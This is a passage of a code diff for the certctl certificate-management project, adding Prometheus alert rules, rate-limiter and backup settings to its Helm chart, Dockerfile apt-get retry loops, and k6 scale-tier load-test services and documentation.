|
name: {{ include "certctl.fullname" . }}-rules
|
||||||
|
labels:
|
||||||
|
{{- include "certctl.labels" . | nindent 4 }}
|
||||||
|
app.kubernetes.io/component: monitoring
|
||||||
|
{{- with .Values.monitoring.prometheusRules.labels }}
|
||||||
|
{{- toYaml . | nindent 4 }}
|
||||||
|
{{- end }}
|
||||||
|
spec:
|
||||||
|
groups:
|
||||||
|
- name: certctl.alerts
|
||||||
|
interval: {{ .Values.monitoring.prometheusRules.interval | default "60s" }}
|
||||||
|
rules:
|
||||||
|
# ---------------------------------------------------------------
|
||||||
|
# Alert: CertctlCertificateExpiringSoon
|
||||||
|
# Series: certctl_certificate_expiring_soon
|
||||||
|
# The certctl-server counts certs with ExpiresAt in
|
||||||
|
# (now, now + 30d] every metrics scrape. Fires whenever any cert
|
||||||
|
# crosses into that window — operator must triage or extend
|
||||||
|
# automation coverage. Rapid renewal infrastructure should keep
|
||||||
|
# this number small in steady state.
|
||||||
|
# ---------------------------------------------------------------
|
||||||
|
- alert: CertctlCertificateExpiringSoon
|
||||||
|
expr: certctl_certificate_expiring_soon > {{ .Values.monitoring.prometheusRules.thresholds.expiringCertificateCount | default 0 }}
|
||||||
|
for: {{ .Values.monitoring.prometheusRules.thresholds.expiringCertificateFor | default "5m" }}
|
||||||
|
labels:
|
||||||
|
severity: warning
|
||||||
|
component: certctl
|
||||||
|
annotations:
|
||||||
|
summary: "certctl: {{`{{ $value }}`}} certificate(s) expiring within 30 days"
|
||||||
|
description: >-
|
||||||
|
certctl_certificate_expiring_soon has been > {{ .Values.monitoring.prometheusRules.thresholds.expiringCertificateCount | default 0 }}
|
||||||
|
for 5+ minutes. Investigate via
|
||||||
|
/api/v1/certificates?status=expiring or the dashboard's
|
||||||
|
Expiring tab. If renewal automation should have covered
|
||||||
|
these, check the renewal scheduler logs for the cert IDs
|
||||||
|
+ the per-issuer failure rate.
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------
|
||||||
|
# Alert: CertctlAgentOffline
|
||||||
|
# Series: certctl_agent_total - certctl_agent_online
|
||||||
|
# Agents flip from online → offline after 5 minutes without a
|
||||||
|
# heartbeat (internal/service/stats.go::GetDashboardSummary).
|
||||||
|
# The 1h `for:` window prevents a flapping agent from paging the
|
||||||
|
# operator on every transient network blip.
|
||||||
|
# ---------------------------------------------------------------
|
||||||
|
- alert: CertctlAgentOffline
|
||||||
|
expr: (certctl_agent_total - certctl_agent_online) > {{ .Values.monitoring.prometheusRules.thresholds.offlineAgentCount | default 0 }}
|
||||||
|
for: {{ .Values.monitoring.prometheusRules.thresholds.offlineAgentFor | default "1h" }}
|
||||||
|
labels:
|
||||||
|
severity: warning
|
||||||
|
component: certctl-agent
|
||||||
|
annotations:
|
||||||
|
summary: "certctl: {{`{{ $value }}`}} agent(s) offline for >1h"
|
||||||
|
description: >-
|
||||||
|
One or more certctl-agent instances have been without a
|
||||||
|
heartbeat for over an hour. Check the agent logs on the
|
||||||
|
affected hosts. If the agent host is intentionally
|
||||||
|
decommissioned, retire the agent via the dashboard or
|
||||||
|
POST /api/v1/agents/{id}/retire to suppress this alert.
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------
|
||||||
|
# Alert: CertctlJobFailureRateHigh
|
||||||
|
# Series: certctl_job_failed_total / (certctl_job_failed_total + certctl_job_completed_total)
|
||||||
|
# Computes the failure rate over a 15-minute rate() window so
|
||||||
|
# short bursts don't fire but a sustained issue does. The 5%
|
||||||
|
# threshold is a conservative starter — adjust per fleet's
|
||||||
|
# baseline.
|
||||||
|
# ---------------------------------------------------------------
|
||||||
|
- alert: CertctlJobFailureRateHigh
  # Failure ratio = failed / (failed + completed), both as 15m
  # per-second rates. The denominator is deliberately NOT clamped:
  # rate() is per-second, so a clamp_min(..., 1) floor would pin the
  # denominator at 1 job/s for any fleet running fewer jobs than that
  # and turn the "ratio" into the raw failure rate, which practically
  # never crosses the threshold. When no jobs ran at all the division
  # is 0/0 = NaN, which the `>` comparison filters out, so the alert
  # stays silent on an idle system.
  expr: >-
    (
    rate(certctl_job_failed_total[15m])
    /
    (rate(certctl_job_failed_total[15m]) + rate(certctl_job_completed_total[15m]))
    ) > {{ .Values.monitoring.prometheusRules.thresholds.jobFailureRate | default 0.05 }}
  for: {{ .Values.monitoring.prometheusRules.thresholds.jobFailureRateFor | default "15m" }}
  labels:
    severity: warning
    component: certctl
  annotations:
    summary: "certctl: job failure rate above 5% over 15m"
    description: >-
      The 15m rate of certctl_job_failed_total / total jobs
      has been above 5% for 15+ minutes. Open
      /api/v1/jobs?status=failed to see the failing job IDs
      and root-cause the recurring error class.
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------
|
||||||
|
# Alert: CertctlIssuanceFailures
|
||||||
|
# Series: certctl_issuance_failures_total
|
||||||
|
# Any non-zero rate of issuance failures over a 15m window is
|
||||||
|
# operationally significant — a single CA outage or expired
|
||||||
|
# ACME account can cascade across the fleet.
|
||||||
|
# ---------------------------------------------------------------
|
||||||
|
- alert: CertctlIssuanceFailures
|
||||||
|
expr: rate(certctl_issuance_failures_total[15m]) > {{ .Values.monitoring.prometheusRules.thresholds.issuanceFailureRate | default 0 }}
|
||||||
|
for: {{ .Values.monitoring.prometheusRules.thresholds.issuanceFailureFor | default "15m" }}
|
||||||
|
labels:
|
||||||
|
severity: warning
|
||||||
|
component: certctl
|
||||||
|
annotations:
|
||||||
|
summary: "certctl: certificate issuance / renewal failures over 15m"
|
||||||
|
description: >-
|
||||||
|
certctl_issuance_failures_total has been incrementing
|
||||||
|
over the last 15 minutes. Check the per-issuer breakdown
|
||||||
|
via /api/v1/issuers + the failed-job log in
|
||||||
|
/api/v1/jobs?status=failed. Common causes: CA
|
||||||
|
outage, ACME account rate-limit, EAB credential
|
||||||
|
expiration, stepca provisioner key rotation without
|
||||||
|
certctl-side update.
|
||||||
|
{{- end }}
|
||||||
@@ -12,6 +12,8 @@ data:
|
|||||||
keygen-mode: {{ .Values.server.keygen.mode | quote }}
|
keygen-mode: {{ .Values.server.keygen.mode | quote }}
|
||||||
rate-limit-rps: {{ .Values.server.rateLimiting.rps | quote }}
|
rate-limit-rps: {{ .Values.server.rateLimiting.rps | quote }}
|
||||||
rate-limit-burst: {{ .Values.server.rateLimiting.burst | quote }}
|
rate-limit-burst: {{ .Values.server.rateLimiting.burst | quote }}
|
||||||
|
rate-limit-backend: {{ .Values.server.rateLimiting.backend | default "memory" | quote }}
|
||||||
|
rate-limit-janitor-interval: {{ .Values.server.rateLimiting.janitorInterval | default "5m" | quote }}
|
||||||
{{- if .Values.server.cors.origins }}
|
{{- if .Values.server.cors.origins }}
|
||||||
cors-origins: {{ .Values.server.cors.origins | quote }}
|
cors-origins: {{ .Values.server.cors.origins | quote }}
|
||||||
{{- end }}
|
{{- end }}
|
||||||
|
|||||||
@@ -108,6 +108,19 @@ spec:
|
|||||||
configMapKeyRef:
|
configMapKeyRef:
|
||||||
name: {{ include "certctl.fullname" . }}-server
|
name: {{ include "certctl.fullname" . }}-server
|
||||||
key: rate-limit-burst
|
key: rate-limit-burst
|
||||||
|
# Phase 13 Sprint 13.3 (ARCH-M1) — cross-replica-consistent
|
||||||
|
# sliding-window rate limiter. Default memory; flip to
|
||||||
|
# postgres when server.replicas > 1.
|
||||||
|
- name: CERTCTL_RATE_LIMIT_BACKEND
|
||||||
|
valueFrom:
|
||||||
|
configMapKeyRef:
|
||||||
|
name: {{ include "certctl.fullname" . }}-server
|
||||||
|
key: rate-limit-backend
|
||||||
|
- name: CERTCTL_RATE_LIMIT_JANITOR_INTERVAL
|
||||||
|
valueFrom:
|
||||||
|
configMapKeyRef:
|
||||||
|
name: {{ include "certctl.fullname" . }}-server
|
||||||
|
key: rate-limit-janitor-interval
|
||||||
{{- if .Values.server.cors.origins }}
|
{{- if .Values.server.cors.origins }}
|
||||||
- name: CERTCTL_CORS_ORIGINS
|
- name: CERTCTL_CORS_ORIGINS
|
||||||
valueFrom:
|
valueFrom:
|
||||||
|
|||||||
@@ -31,6 +31,36 @@ server:
|
|||||||
port: 8443
|
port: 8443
|
||||||
|
|
||||||
# Resource requests and limits
|
# Resource requests and limits
|
||||||
|
#
|
||||||
|
# Phase 4 DEPL-M5 (2026-05-14): per-fleet-size tuning ladder. The
|
||||||
|
# default values below are validated against the demo dataset
|
||||||
|
# (15 certs / 1 agent) and the baselines in
|
||||||
|
# docs/operator/performance-baselines.md (single endpoint < 5s for
|
||||||
|
# 100 sequential requests = ~50ms p50; cursor-paginated 1000-cert
|
||||||
|
# inventory walk < 3s; renewal scan for 15 certs < 100ms).
|
||||||
|
#
|
||||||
|
# Larger fleet recommendations (TBD pending Phase 8 load-test runs;
|
||||||
|
# operators tune empirically until then — capture readings in your
|
||||||
|
# own loadtest-baselines log):
|
||||||
|
#
|
||||||
|
# ≤ 500 certs / 100 agents: defaults below (100m / 128Mi req, 500m / 512Mi lim)
|
||||||
|
# 5K certs / 1K agents: tune up — TBD Phase 8 (suggested starter: 500m / 512Mi req, 2000m / 2Gi lim)
|
||||||
|
# 50K certs / 10K agents: tune up — TBD Phase 8 (suggested starter: 2000m / 2Gi req, 4000m / 4Gi lim)
|
||||||
|
#
|
||||||
|
# The "suggested starter" values above are operator-tuning starting
|
||||||
|
# points, NOT validated. Phase 8 (load test coverage expansion) will
|
||||||
|
# measure them against synthetic fleets and replace the suggestions
|
||||||
|
# with measured ceilings. Until then, treat them as a "raise CPU
|
||||||
|
# before raising memory; raise both before scaling out" mental
|
||||||
|
# model. Per docs/operator/performance-baselines.md, certctl-server
|
||||||
|
# is CPU-bound on issuance / renewal scan work and memory-bound on
|
||||||
|
# the inventory query path.
|
||||||
|
#
|
||||||
|
# Database scale (postgresql.* below) tracks server scale roughly
|
||||||
|
# 1:1 — at 50K certs the Postgres instance needs 4 CPU / 4Gi RAM
|
||||||
|
# and shared_buffers ≥ 1Gi. Postgres tuning is out of scope for
|
||||||
|
# this comment; see docs/operator/runbooks/postgres-backup.md
|
||||||
|
# for the production-tuning entry-point.
|
||||||
resources:
|
resources:
|
||||||
requests:
|
requests:
|
||||||
cpu: 100m
|
cpu: 100m
|
||||||
@@ -181,8 +211,25 @@ server:
|
|||||||
|
|
||||||
# Rate limiting configuration
|
# Rate limiting configuration
|
||||||
rateLimiting:
|
rateLimiting:
|
||||||
rps: 100 # Requests per second
|
rps: 100 # Requests per second (token-bucket middleware)
|
||||||
burst: 200 # Burst capacity
|
burst: 200 # Burst capacity (token-bucket middleware)
|
||||||
|
|
||||||
|
# Sliding-window-log rate-limit backend (Phase 13 Sprint 13.2/13.3
|
||||||
|
# ARCH-M1 closure). Selects the implementation backing the
|
||||||
|
# break-glass / OCSP / cert-export / EST limiters. See
|
||||||
|
# docs/operator/observability.md for the operator decision tree.
|
||||||
|
#
|
||||||
|
# memory — per-process (default; single-replica deploys).
|
||||||
|
# postgres — cross-replica-consistent via rate_limit_buckets.
|
||||||
|
# REQUIRED when server.replicas > 1 for accurate
|
||||||
|
# cluster-wide enforcement.
|
||||||
|
backend: memory
|
||||||
|
|
||||||
|
# Scheduler janitor interval for the postgres backend's
|
||||||
|
# rate_limit_buckets sweep. Ignored when backend=memory (the
|
||||||
|
# in-memory backend self-prunes on every Allow call).
|
||||||
|
# Default 5m; minimum 1m.
|
||||||
|
janitorInterval: "5m"
|
||||||
|
|
||||||
# Network scanning configuration
|
# Network scanning configuration
|
||||||
networkScan:
|
networkScan:
|
||||||
@@ -449,6 +496,27 @@ agent:
|
|||||||
replicas: 1
|
replicas: 1
|
||||||
|
|
||||||
# Resource requests and limits
|
# Resource requests and limits
|
||||||
|
#
|
||||||
|
# Phase 4 DEPL-M5 (2026-05-14): per-fleet-size tuning ladder for the
|
||||||
|
# agent. Defaults are sized for the standard "one cert per host"
|
||||||
|
# operating pattern: the agent polls the server every 30 seconds
|
||||||
|
# (hardcoded in cmd/agent/main.go::pollInterval — not yet
|
||||||
|
# env-configurable), generates ECDSA P-256 keys locally on
|
||||||
|
# issuance/renewal events, and is otherwise idle. CPU is bursty only
|
||||||
|
# during keygen + CSR submission.
|
||||||
|
#
|
||||||
|
# Tuning ladder (TBD pending Phase 8 — measure on your fleet):
|
||||||
|
#
|
||||||
|
# 1 cert / host (typical): defaults below (50m / 64Mi req, 200m / 256Mi lim)
|
||||||
|
# 10 certs / host: stays at defaults — agent is poll-driven, not work-bound by cert count
|
||||||
|
# 100 certs / host (rare): raise lim to 500m / 512Mi if you see throttling on issuance bursts
|
||||||
|
#
|
||||||
|
# The agent does NOT cache certs in memory — issuance is one-shot
|
||||||
|
# generate-then-deploy. So per-host memory scales with whatever
|
||||||
|
# truststore PEM bundles the agent's connectors load (Apache /
|
||||||
|
# Postfix / similar), not with the cert count. Defaults are
|
||||||
|
# appropriate for any "agent terminates ≤ 100 certs on this host"
|
||||||
|
# deployment.
|
||||||
resources:
|
resources:
|
||||||
requests:
|
requests:
|
||||||
cpu: 50m
|
cpu: 50m
|
||||||
@@ -612,6 +680,149 @@ monitoring:
|
|||||||
# Optional relabeling for the scrape job.
|
# Optional relabeling for the scrape job.
|
||||||
# relabelings: []
|
# relabelings: []
|
||||||
|
|
||||||
|
# ----------------------------------------------------------------------
|
||||||
|
# Phase 4 DEPL-L2 closure (2026-05-14): PrometheusRule (alert rules)
|
||||||
|
#
|
||||||
|
# Operator opt-in. Requires Prometheus Operator CRDs (the
|
||||||
|
# `monitoring.coreos.com/v1` PrometheusRule kind) installed in
|
||||||
|
# cluster. Without those CRDs the rendered object is rejected by
|
||||||
|
# `kubectl apply` — keep enabled: false if you scrape with vanilla
|
||||||
|
# Prometheus + AlertManager rules ConfigMap instead.
|
||||||
|
#
|
||||||
|
# Four starter rules ship out of the box (see
|
||||||
|
# templates/prometheusrules.yaml for the full PromQL):
|
||||||
|
#
|
||||||
|
# CertctlCertificateExpiringSoon — certs expiring within 30d
|
||||||
|
# CertctlAgentOffline — agent without heartbeat for >1h
|
||||||
|
# CertctlJobFailureRateHigh — job-failure rate over 5% (15m)
|
||||||
|
# CertctlIssuanceFailures — any issuance failures in last 15m
|
||||||
|
#
|
||||||
|
# All thresholds are operator-tunable via the `thresholds:` block
|
||||||
|
# below. The defaults are tuned for the demo dataset (15 certs / 1
|
||||||
|
# agent); production fleets with sustained renewal volume MAY want
|
||||||
|
# to raise the expiringCertificateCount + jobFailureRate thresholds
|
||||||
|
# to suppress steady-state noise.
|
||||||
|
prometheusRules:
|
||||||
|
enabled: false
|
||||||
|
# Evaluation interval for the rule group.
|
||||||
|
interval: 60s
|
||||||
|
# Additional labels applied to the PrometheusRule metadata.
|
||||||
|
# labels: {}
|
||||||
|
# Per-alert threshold / duration tunables.
|
||||||
|
thresholds:
|
||||||
|
# Fire when more than N certs are in the expiring-soon window.
|
||||||
|
expiringCertificateCount: 0
|
||||||
|
expiringCertificateFor: 5m
|
||||||
|
# Fire when more than N agents are offline (server - online).
|
||||||
|
offlineAgentCount: 0
|
||||||
|
offlineAgentFor: 1h
|
||||||
|
# Fire when job failure rate exceeds this fraction (15m window).
|
||||||
|
jobFailureRate: 0.05
|
||||||
|
jobFailureRateFor: 15m
|
||||||
|
# Fire when issuance failure rate exceeds this value (15m window).
|
||||||
|
issuanceFailureRate: 0
|
||||||
|
issuanceFailureFor: 15m
|
||||||
|
|
||||||
|
# ==============================================================================
|
||||||
|
# Backup CronJob (Phase 4 DEPL-H2 closure, 2026-05-14)
|
||||||
|
# ==============================================================================
|
||||||
|
# Operator opt-in. Default OFF. The CronJob runs `pg_dump --format=custom
|
||||||
|
# --no-owner --no-acl --dbname=certctl` matching the canonical shape
|
||||||
|
# documented in docs/operator/runbooks/postgres-backup.md (so manual
|
||||||
|
# and automated dumps use identical pg_dump flags) and ships the result to a
|
||||||
|
# sink chosen below.
|
||||||
|
#
|
||||||
|
# DO NOT enable this for managed Postgres deployments (AWS RDS / GCP
|
||||||
|
# Cloud SQL / Azure DB) — those have built-in PITR backup that this
|
||||||
|
# CronJob cannot match. For in-cluster Postgres only.
|
||||||
|
backup:
|
||||||
|
enabled: false
|
||||||
|
# Cron expression (UTC). Default: 02:30 UTC daily.
|
||||||
|
schedule: "30 2 * * *"
|
||||||
|
# Sink: "pvc" (default — dump lands on a PersistentVolumeClaim) or
|
||||||
|
# "s3" (uploads via aws-cli — requires an image that bundles
|
||||||
|
# aws-cli, see backup.image below).
|
||||||
|
sink: pvc
|
||||||
|
# Container image. The default postgres:16-alpine has pg_dump but
|
||||||
|
# NOT aws-cli; for sink: s3 set this to an image that bundles both
|
||||||
|
# (e.g. ghcr.io/your-org/postgres-aws:16) or override the Job's
|
||||||
|
# command to install aws-cli at runtime.
|
||||||
|
image: postgres:16-alpine
|
||||||
|
imagePullPolicy: IfNotPresent
|
||||||
|
# PVC sink config — used when sink: pvc.
|
||||||
|
pvc:
|
||||||
|
# Name of an existing PersistentVolumeClaim mounted at /backups
|
||||||
|
# in the Job's pod. The PVC's storage class controls durability
|
||||||
|
# and snapshot retention. Operator creates this PVC out of band
|
||||||
|
# via their own storage policy.
|
||||||
|
claimName: certctl-backups
|
||||||
|
# S3 sink config — used when sink: s3.
|
||||||
|
s3:
|
||||||
|
# Target bucket (without s3:// prefix).
|
||||||
|
bucket: ""
|
||||||
|
# Object key prefix inside the bucket. Dumps land at
|
||||||
|
# s3://<bucket>/<prefix>/certctl-<TIMESTAMP>.dump.
|
||||||
|
prefix: certctl
|
||||||
|
# AWS region (sets AWS_DEFAULT_REGION). Optional if the image's
|
||||||
|
# AWS SDK can resolve the region another way (instance profile,
|
||||||
|
# IRSA, etc.).
|
||||||
|
region: ""
|
||||||
|
# Secret holding AWS credentials. The IAM principal needs
|
||||||
|
# s3:PutObject + s3:ListBucket on the target bucket only.
|
||||||
|
credentialsSecret:
|
||||||
|
name: certctl-backup-aws-creds
|
||||||
|
accessKeyIdKey: AWS_ACCESS_KEY_ID
|
||||||
|
secretAccessKeyKey: AWS_SECRET_ACCESS_KEY
|
||||||
|
# Job housekeeping.
|
||||||
|
successfulJobsHistoryLimit: 3
|
||||||
|
failedJobsHistoryLimit: 1
|
||||||
|
startingDeadlineSeconds: 300
|
||||||
|
backoffLimit: 1
|
||||||
|
activeDeadlineSeconds: 3600
|
||||||
|
# Resource budget for the backup container. pg_dump is generally
|
||||||
|
# memory-light; ~250MB RSS for fleets up to 100K certs is typical.
|
||||||
|
resources:
|
||||||
|
requests:
|
||||||
|
cpu: 100m
|
||||||
|
memory: 128Mi
|
||||||
|
limits:
|
||||||
|
cpu: 500m
|
||||||
|
memory: 512Mi
|
||||||
|
# Optional tolerations for the backup Job pod.
|
||||||
|
tolerations: []
|
||||||
|
|
||||||
|
# ==============================================================================
|
||||||
|
# Migrations via Helm hook (Phase 4 DEPL-M1 closure, 2026-05-14)
|
||||||
|
# ==============================================================================
|
||||||
|
# When viaHook: true, the chart deploys templates/migration-job.yaml as
|
||||||
|
# a pre-install + pre-upgrade hook that runs `certctl-server
|
||||||
|
# --migrate-only` (a hermetic schema-mutation pass) before the server
|
||||||
|
# Deployment rolls.
|
||||||
|
#
|
||||||
|
# Set CERTCTL_MIGRATIONS_VIA_HOOK=true in the server Deployment env to
|
||||||
|
# tell the server to skip its boot-time RunMigrations call (the hook
|
||||||
|
# already did the work; running again at boot would race across
|
||||||
|
# replicas during rollouts).
|
||||||
|
#
|
||||||
|
# Default OFF — when off, the server runs migrations at boot exactly
|
||||||
|
# as it always has (Compose deploys keep this path).
|
||||||
|
migrations:
|
||||||
|
viaHook: false
|
||||||
|
# Job housekeeping.
|
||||||
|
backoffLimit: 1
|
||||||
|
activeDeadlineSeconds: 600
|
||||||
|
# Resource budget for the migration Job pod. The migration pass is
|
||||||
|
# I/O-bound on Postgres; matches the server's resource budget by
|
||||||
|
# default. Override here if migrations on a large database need
|
||||||
|
# more headroom than the steady-state server.
|
||||||
|
# resources:
|
||||||
|
# requests:
|
||||||
|
# cpu: 100m
|
||||||
|
# memory: 128Mi
|
||||||
|
# limits:
|
||||||
|
# cpu: 500m
|
||||||
|
# memory: 512Mi
|
||||||
|
|
||||||
# ==============================================================================
|
# ==============================================================================
|
||||||
# Network Policy (Bundle 3 closure / D11)
|
# Network Policy (Bundle 3 closure / D11)
|
||||||
# ==============================================================================
|
# ==============================================================================
|
||||||
|
|||||||
@@ -82,16 +82,30 @@ ARG LIBEST_REF
|
|||||||
# is the same major version libest r3.2.0 was tested against. libest
|
# is the same major version libest r3.2.0 was tested against. libest
|
||||||
# also wants libcurl + libsafec; we install both via apt rather than
|
# also wants libcurl + libsafec; we install both via apt rather than
|
||||||
# building from source for reproducibility.
|
# building from source for reproducibility.
|
||||||
RUN apt-get update && apt-get install --no-install-recommends -y \
|
#
|
||||||
autoconf \
|
# Hotfix #18 (2026-05-14): wrap in a 3-retry loop with --fix-missing
|
||||||
automake \
|
# fallback to absorb transient Debian mirror flakes. The original
|
||||||
build-essential \
|
# unwrapped apt-get install failed CI run #N on a "Connection reset
|
||||||
ca-certificates \
|
# by peer" mid-fetch of libssh2-1 from fastly's debian.org mirror at
|
||||||
git \
|
# 151.101.202.132. Mirrors flake; production-grade Dockerfiles wrap
|
||||||
libcurl4-openssl-dev \
|
# network ops in retry. Same pattern as the main Dockerfile's npm-ci
|
||||||
libssl-dev \
|
# 3-retry loop from Hotfix #9.
|
||||||
libtool \
|
RUN for i in 1 2 3; do \
|
||||||
pkg-config \
|
apt-get update && \
|
||||||
|
apt-get install --no-install-recommends -y --fix-missing \
|
||||||
|
autoconf \
|
||||||
|
automake \
|
||||||
|
build-essential \
|
||||||
|
ca-certificates \
|
||||||
|
git \
|
||||||
|
libcurl4-openssl-dev \
|
||||||
|
libssl-dev \
|
||||||
|
libtool \
|
||||||
|
pkg-config \
|
||||||
|
&& break; \
|
||||||
|
# Abort once the final attempt has failed. Without this the loop's exit
# status is that of the trailing `sleep` (0), so the build would continue
# with the packages missing.
if [ "$i" -eq 3 ]; then echo "apt-get install failed after 3 attempts; aborting build" >&2; exit 1; fi; \
echo "apt-get install attempt $i/3 failed; sleeping 5s before retry"; \
|
||||||
|
sleep 5; \
|
||||||
|
done \
|
||||||
&& rm -rf /var/lib/apt/lists/*
|
&& rm -rf /var/lib/apt/lists/*
|
||||||
|
|
||||||
WORKDIR /src
|
WORKDIR /src
|
||||||
@@ -172,13 +186,22 @@ RUN git clone --depth 1 --branch ${LIBEST_REF} https://github.com/cisco/libest.g
|
|||||||
# Pinned to the same digest as the builder above (Bundle A / H-001).
|
# Pinned to the same digest as the builder above (Bundle A / H-001).
|
||||||
FROM debian:bullseye-slim@sha256:1a4701c321b1d28b1ff5f0230e766791e4b79b1d4c6c7a70064f4b297b1a330f
|
FROM debian:bullseye-slim@sha256:1a4701c321b1d28b1ff5f0230e766791e4b79b1d4c6c7a70064f4b297b1a330f
|
||||||
|
|
||||||
RUN apt-get update && apt-get install --no-install-recommends -y \
|
# Hotfix #18 (2026-05-14): same 3-retry pattern as the builder stage
|
||||||
bash \
|
# above. Runtime image installs are also vulnerable to transient
|
||||||
ca-certificates \
|
# mirror flakes.
|
||||||
curl \
|
RUN for i in 1 2 3; do \
|
||||||
libcurl4 \
|
apt-get update && \
|
||||||
libssl1.1 \
|
apt-get install --no-install-recommends -y --fix-missing \
|
||||||
openssl \
|
bash \
|
||||||
|
ca-certificates \
|
||||||
|
curl \
|
||||||
|
libcurl4 \
|
||||||
|
libssl1.1 \
|
||||||
|
openssl \
|
||||||
|
&& break; \
|
||||||
|
# Abort once the final attempt has failed. Without this the loop's exit
# status is that of the trailing `sleep` (0), so the runtime image would be
# built with the packages missing.
if [ "$i" -eq 3 ]; then echo "apt-get install failed after 3 attempts; aborting build" >&2; exit 1; fi; \
echo "apt-get install attempt $i/3 failed; sleeping 5s before retry"; \
|
||||||
|
sleep 5; \
|
||||||
|
done \
|
||||||
&& rm -rf /var/lib/apt/lists/* \
|
&& rm -rf /var/lib/apt/lists/* \
|
||||||
&& useradd --create-home --uid 1000 estuser
|
&& useradd --create-home --uid 1000 estuser
|
||||||
|
|
||||||
|
|||||||
@@ -352,8 +352,35 @@ the ACME flow scenario. Operators with kind / cert-manager available
|
|||||||
should pair this with `make acme-cert-manager-test` for end-to-end
|
should pair this with `make acme-cert-manager-test` for end-to-end
|
||||||
verification.
|
verification.
|
||||||
|
|
||||||
|
## Scale tier (Phase 8 SCALE-H2, 2026-05-14)
|
||||||
|
|
||||||
|
Phase 8 closure added three new k6 scenarios that exercise the
|
||||||
|
scale-relevant load surfaces the API tier and connector tier left
|
||||||
|
uncovered:
|
||||||
|
|
||||||
|
| Scenario | k6 file | Seed | Make target |
|
||||||
|
|---|---|---|---|
|
||||||
|
| Bulk-renewal under load | `k6/bulk_renewal.js` | `seed/01_bulk_renewal_certs.sql` (10K certs) | `make loadtest-scale-bulk` |
|
||||||
|
| ACME enrollment burst | `k6/acme_burst.js` | (none — unauth surface) | `make loadtest-scale-acme` |
|
||||||
|
| Agent heartbeat storm | `k6/agent_storm.js` | `seed/02_agent_fleet.sql` (5K agents) | `make loadtest-scale-agent` |
|
||||||
|
|
||||||
|
The scale-tier scenarios live behind the `scale` compose profile so
|
||||||
|
the default `make loadtest` (API tier + connector tier, ~7 min)
|
||||||
|
stays fast. Run all three serially with `make loadtest-scale`, or
|
||||||
|
trigger the `loadtest.yml` workflow's `k6-scale` matrix jobs from
|
||||||
|
the Actions tab for canonical-hardware capture.
|
||||||
|
|
||||||
|
Operator-facing baseline table + threshold contracts + documented
|
||||||
|
limitations live in [`docs/operator/scale.md`](../../../docs/operator/scale.md)
|
||||||
|
under the "Scale-tier scenarios (SCALE-H2, Phase 8)" section. Treat
|
||||||
|
that as the canonical source — this README only links.
|
||||||
|
|
||||||
|
The seed fixtures + their idempotency contract are documented in
|
||||||
|
[`seed/README.md`](seed/README.md).
|
||||||
|
|
||||||
## Audit references
|
## Audit references
|
||||||
|
|
||||||
- API tier: 2026-05-01 issuer coverage audit fix #8.
|
- API tier: 2026-05-01 issuer coverage audit fix #8.
|
||||||
- Connector tier: 2026-05-02 deployment-target audit Bundle 10.
|
- Connector tier: 2026-05-02 deployment-target audit Bundle 10.
|
||||||
- ACME flows: Phase 5 master prompt (project notes).
|
- ACME flows: Phase 5 master prompt (project notes).
|
||||||
|
- Scale tier: 2026-05-14 architecture diligence Phase 8 (SCALE-H2).
|
||||||
|
|||||||
@@ -351,3 +351,128 @@ services:
|
|||||||
- run
|
- run
|
||||||
- --summary-export=/results/summary.json
|
- --summary-export=/results/summary.json
|
||||||
- /scripts/k6.js
|
- /scripts/k6.js
|
||||||
|
|
||||||
|
# ===========================================================================
|
||||||
|
# Phase 8 SCALE-H2 — scale-tier scenarios (opt-in via `--profile scale`).
|
||||||
|
#
|
||||||
|
# The default `make loadtest` path runs the API tier + connector tier
|
||||||
|
# scenarios above against the demo-scale seed. The Phase 8 scenarios are
|
||||||
|
# heavier (10K cert + 5K agent fixtures) and would slow the default path
|
||||||
|
# without serving the per-PR signal the existing run targets, so they live
|
||||||
|
# behind a separate compose profile.
|
||||||
|
#
|
||||||
|
# Three components, all profile-gated:
|
||||||
|
# 1. scale-seed — one-shot init that runs ./seed/*.sql against the
|
||||||
|
# same postgres the server uses. Idempotent.
|
||||||
|
# 2. k6-scale-bulk / k6-scale-acme / k6-scale-agent — one driver each
|
||||||
|
# for the three Phase 8 scenarios. The matrix dispatch
|
||||||
|
# in .github/workflows/loadtest.yml picks one per job.
|
||||||
|
#
|
||||||
|
# Run a single scale scenario locally:
|
||||||
|
# docker compose --profile scale up \
|
||||||
|
# --abort-on-container-exit --exit-code-from k6-scale-bulk \
|
||||||
|
# scale-seed k6-scale-bulk
|
||||||
|
# ===========================================================================
|
||||||
|
|
||||||
|
scale-seed:
|
||||||
|
# postgres:16-alpine bundles psql; no extra image needed.
|
||||||
|
image: postgres:16-alpine
|
||||||
|
container_name: certctl-loadtest-scale-seed
|
||||||
|
restart: "no"
|
||||||
|
profiles: ["scale"]
|
||||||
|
depends_on:
|
||||||
|
postgres:
|
||||||
|
condition: service_healthy
|
||||||
|
# Wait for certctl-server to be healthy — the server runs schema
|
||||||
|
# migrations + seed_demo.sql at boot. The Phase 8 seeds reference
|
||||||
|
# FKs (iss-local, o-alice, t-platform, rp-standard) that
|
||||||
|
# seed_demo.sql creates, so the order MUST be:
|
||||||
|
# postgres up → server runs migrations + seed_demo.sql → scale-seed runs
|
||||||
|
certctl-server:
|
||||||
|
condition: service_healthy
|
||||||
|
environment:
|
||||||
|
PGHOST: postgres
|
||||||
|
PGUSER: certctl
|
||||||
|
PGPASSWORD: loadtestpass
|
||||||
|
PGDATABASE: certctl
|
||||||
|
volumes:
|
||||||
|
- ./seed:/seed:ro
|
||||||
|
entrypoint: /bin/sh
|
||||||
|
command:
|
||||||
|
- -c
|
||||||
|
- |
|
||||||
|
set -eu
|
||||||
|
echo "==> Phase 8 scale-seed: running SQL fixtures (lexical order)"
|
||||||
|
for f in /seed/*.sql; do
|
||||||
|
echo "----> $$f"
|
||||||
|
psql -v ON_ERROR_STOP=1 -f "$$f"
|
||||||
|
done
|
||||||
|
echo "==> Phase 8 scale-seed: complete"
|
||||||
|
|
||||||
|
k6-scale-bulk:
|
||||||
|
image: grafana/k6:0.54.0
|
||||||
|
container_name: certctl-loadtest-k6-bulk
|
||||||
|
profiles: ["scale"]
|
||||||
|
depends_on:
|
||||||
|
certctl-server:
|
||||||
|
condition: service_healthy
|
||||||
|
scale-seed:
|
||||||
|
condition: service_completed_successfully
|
||||||
|
environment:
|
||||||
|
CERTCTL_BASE: https://certctl-server:8443
|
||||||
|
CERTCTL_TOKEN: load-test-token
|
||||||
|
K6_INSECURE_SKIP_TLS_VERIFY: "true"
|
||||||
|
